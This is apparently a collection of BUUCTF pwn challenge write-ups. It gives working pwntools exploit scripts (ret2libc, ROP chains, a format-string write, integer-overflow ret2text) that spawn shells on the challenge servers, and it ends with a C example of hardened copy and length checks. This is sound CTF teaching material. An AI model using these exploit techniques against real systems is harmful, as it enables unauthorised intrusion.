BUUCTF PWN Page 1 Writeups, 32 challenges (Part 3)

not_the_same_3dsctf_2016

Much like an earlier challenge: overflow into a call to get_secret, then write the flag buffer to stdout.

```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
#context(os='linux', arch='amd64')
#p = process('./1')
p = remote('node4.buuoj.cn', 28016)
elf = ELF('1')

get_secret_addr = elf.symbols['get_secret']
exit_addr = elf.symbols['exit']
write_addr = elf.symbols['write']
flag_addr = 0x080ECA2D  # buffer that get_secret fills with the flag

# get_secret() returns into write(1, flag_addr, 0x100), which returns into exit()
payload = b'a'*45 + p32(get_secret_addr) + p32(write_addr) + p32(exit_addr) + p32(1) + p32(flag_addr) + p32(0x100)
p.sendline(payload)
print(p.recv())
```

ciscn_2019_n_5

A bare ret2libc.

```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
#p = process('pwn')
p = remote('node4.buuoj.cn', 26628)
elf = ELF('pwn')

ret = 0x00000000004004c9  # ret gadget, used for stack alignment
rdi = 0x0000000000400713  # pop rdi; ret

# round 1: leak puts@got via puts@plt, then return to main
p.sendlineafter(b'tell me your name\n', b'w1nd')
payload = b'a'*0x28 + p64(rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])
p.sendlineafter(b'What do you want to say to me?\n', payload)

puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc = ELF('buu/libc-2.27-x64.so')
libcbase = puts_addr - libc.sym['puts']
system = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b'/bin/sh\x00'))

# round 2: system("/bin/sh")
p.sendlineafter(b'tell me your name\n', b'w1nd')
payload = b'a'*0x28 + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
p.sendlineafter(b'What do you want to say to me?\n', payload)
p.interactive()
```

others_shellcode

Just connect with nc: the binary already makes an execve system call.

ciscn_2019_ne_5
The strcpy call here is what causes the stack overflow.
When building the payload, remember that none of the four bytes of the return address placed after the system address may be zero: strcpy stops copying as soon as it meets a \x00.
```python
from pwn import *
from LibcSearcher import *

#context.log_level = 'debug'
#context(os='linux', arch='amd64')
#p = process('./1')
p = remote("node4.buuoj.cn", 29577)
elf = ELF('1')

system_addr = elf.symbols['system']
sh_addr = next(elf.search(b'sh\x00'))  # "sh" string already present in the binary
ret = 0x0804843e

p.sendlineafter(b'Please input admin password', b'administrator')
p.sendlineafter(b'0.Exit\n:', b'1')
# the return-address slot after system must not contain a zero byte, so it is filled with b'a'*4
payload = b'a'*(0x48+4) + p32(system_addr) + b'a'*4 + p32(sh_addr)
p.sendlineafter(b'Please input new log info:', payload)
p.sendlineafter(b'0.Exit\n:', b'4')
p.interactive()
```

铁人三项(第五赛区)_2018_rop

Here write is used to leak libc; the rest is an ordinary ret2libc.
```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
#p = process('pwn')
p = remote('node4.buuoj.cn', 29939)
elf = ELF('pwn')

# write(1, write@got, 4), then return to main
payload = b'a'*0x8c + p32(elf.sym['write']) + p32(elf.sym['main']) + p32(1) + p32(elf.got['write']) + p32(0x4)
p.sendline(payload)
write_addr = u32(p.recv(4))  # exactly the 4 leaked bytes

libc = ELF('buu/libc-2.27.so')
libcbase = write_addr - libc.sym['write']
system = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b'/bin/sh\x00'))

payload = b'a'*0x8c + p32(system) + p32(0) + p32(binsh)
p.sendline(payload)
p.interactive()
```

bjdctf_2020_babyrop

An ordinary ret2libc.

```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
#p = process('pwn')
p = remote('node4.buuoj.cn', 26698)
elf = ELF('pwn')

rdi = 0x400733  # pop rdi; ret
ret = 0x4004c9  # ret gadget

payload = b'a'*0x28 + p64(rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])
p.sendlineafter(b'story!\n', payload)
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

libc = ELF('buu/libc-2.23-x64.so')
libcbase = puts_addr - libc.sym['puts']
system = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b'/bin/sh\x00'))

payload = b'a'*0x28 + p64(rdi) + p64(binsh) + p64(system)
p.sendlineafter(b'story!\n', payload)
p.interactive()
```

bjdctf_2020_babystack2

A simple integer overflow plus ret2text.

```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
#p = process('pwn')
p = remote('node4.buuoj.cn', 27408)
elf = ELF('pwn')

p.sendlineafter(b'your name:\n', b'-1')  # negative length passes the signed check
payload = b'a'*0x18 + p64(elf.sym['backdoor'])
p.sendlineafter(b'u name?\n', payload)
p.interactive()
```

jarvisoj_fm

A format string vulnerability.
Debugging shows the format string sits at the 11th argument.
exp
```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
p = process('pwn')
#p = remote('node4.buuoj.cn', 26628)
elf = ELF('pwn')

x_addr = 0x804A02C  # the global x that has to be set to 4
#payload = fmtstr_payload(11, {x_addr: 4})
payload = p32(x_addr) + b'%11$n'  # the 4-byte address itself is the count written by %n
p.sendline(payload)
#print(p.recv())
p.interactive()
```

pwn2_sctf_2016

A simple integer overflow and ret2libc, but there is a pitfall: when finally calling system('/bin/sh'), using p32(0) for the return address makes the exploit fail. Only after reading the assembly did I see that the program reads input with a custom get_n function,
which stops reading as soon as it encounters a \x00 byte.
```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
#p = process('pwn')
p = remote('node4.buuoj.cn', 25339)
elf = ELF('pwn')

# round 1: -1 bypasses the length check; printf("%s"-style fmt, printf@got) leaks libc
p.sendlineafter(b'to read?', b'-1')
payload = b'a'*0x30 + p32(elf.plt['printf']) + p32(elf.sym['main']) + p32(0x80486F8) + p32(elf.got['printf'])
p.sendlineafter(b'bytes of data!\n', payload)
p.recvline()
p.recvuntil(b'You said: ')
printf_addr = u32(p.recv(4))

libc = ELF('buu/libc-2.23.so')
libcbase = printf_addr - libc.sym['printf']
system = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b'/bin/sh\x00'))

# round 2: system("/bin/sh"); note the filler bytes instead of p32(0), since get_n stops at \x00
p.sendlineafter(b'to read?', b'-1')
payload = b'a'*0x30 + p32(system) + b'a'*4 + p32(binsh)
p.sendlineafter(b'bytes of data!\n', payload)
p.interactive()
```
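Two of the bug classes these writeups lean on (ciscn_2019_ne_5's unbounded strcpy and pwn2_sctf_2016's signed length check feeding an unsigned read) are worth seeing from the other side. The C below is an added example, not the code of either challenge binary: it models each bug next to a hardened form. The buffer sizes LOG_SIZE and DATA_SIZE are assumptions taken from the padding lengths the writeups use, and the get_n-style reader is an assumed reconstruction of the helper's shape (stop at the first NUL), not its real code.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed buffer sizes, taken from the padding lengths in the writeups above. */
#define LOG_SIZE  0x48   /* ciscn_2019_ne_5 pads 0x48 bytes up to the saved ebp */
#define DATA_SIZE 0x30   /* pwn2_sctf_2016 pads 0x30 bytes */

/* ---- bug class 1: unbounded strcpy ----
 * strcpy copies every byte up to and including the first NUL and never looks
 * at the destination size; this is how many bytes it would write. */
size_t strcpy_bytes_written(const char *src)
{
    return strlen(src) + 1;
}

/* Hardened replacement: at most dstsz - 1 bytes, always NUL terminated.
 * Returns 1 if the whole source fit, 0 if it had to be truncated. */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    if (dstsz == 0)
        return 0;
    size_t n = strlen(src);
    if (n >= dstsz) {
        memcpy(dst, src, dstsz - 1);
        dst[dstsz - 1] = '\0';
        return 0;
    }
    memcpy(dst, src, n + 1);
    return 1;
}

/* Worked case: a log entry 20 bytes longer than the buffer (constructed input). */
size_t oversized_log_strcpy_bytes(void)
{
    char big[LOG_SIZE + 20];
    memset(big, 'a', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return strcpy_bytes_written(big);   /* 92 bytes into a 72-byte buffer: overflow */
}

size_t oversized_log_bounded_len(void)
{
    char big[LOG_SIZE + 20];
    char log[LOG_SIZE];
    memset(big, 'a', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    bounded_copy(log, sizeof log, big);
    return strlen(log);                 /* 71: truncated but still terminated */
}

/* ---- bug class 2: signed length check before an unsigned read ----
 * The program asks how many bytes to read, compares the answer as a signed
 * int, then hands it to a get_n-style routine that treats it as a count. */
int flawed_length_ok(int n)
{
    return n <= DATA_SIZE;              /* -1 <= 0x30 is true */
}

unsigned int count_after_narrowing(int n)
{
    return (unsigned int)n;             /* -1 becomes 0xFFFFFFFF */
}

/* Hardened check: reject negatives before the value is ever used as a count. */
int fixed_length_ok(long n)
{
    return n >= 0 && n <= DATA_SIZE;
}

/* get_n-style reader over an in-memory source (assumed shape: stops at the
 * first NUL), but with the destination size enforced whatever the caller
 * asked for. Returns the number of bytes copied. */
size_t get_n_bounded(char *dst, size_t dstsz, const char *src, size_t n)
{
    if (dstsz == 0)
        return 0;
    size_t limit = (n < dstsz - 1) ? n : dstsz - 1;
    size_t i = 0;
    while (i < limit && src[i] != '\0') {
        dst[i] = src[i];
        i++;
    }
    dst[i] = '\0';
    return i;
}

/* Worked case: the caller passes the narrowed -1; the destination bound still wins. */
size_t get_n_demo_with_huge_count(void)
{
    char data[DATA_SIZE];
    char src[DATA_SIZE + 40];
    memset(src, 'b', sizeof src - 1);
    src[sizeof src - 1] = '\0';
    return get_n_bounded(data, sizeof data, src, count_after_narrowing(-1));
}

int main(void)
{
    printf("strcpy would write %zu bytes into a %d-byte log\n", oversized_log_strcpy_bytes(), LOG_SIZE);
    printf("bounded copy keeps %zu bytes\n", oversized_log_bounded_len());
    printf("flawed check accepts -1: %d, fixed check accepts -1: %d\n", flawed_length_ok(-1), fixed_length_ok(-1));
    printf("get_n with count 0x%x copies %zu bytes\n", count_after_narrowing(-1), get_n_demo_with_huge_count());
    return 0;
}
```

The second half is the more instructive one: the narrowing from `int` to an unsigned count is where -1 turns into 0xFFFFFFFF, so the check has to happen on the signed value before that conversion, and the reader itself should be bounded by the destination size rather than trusting the count it is handed.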
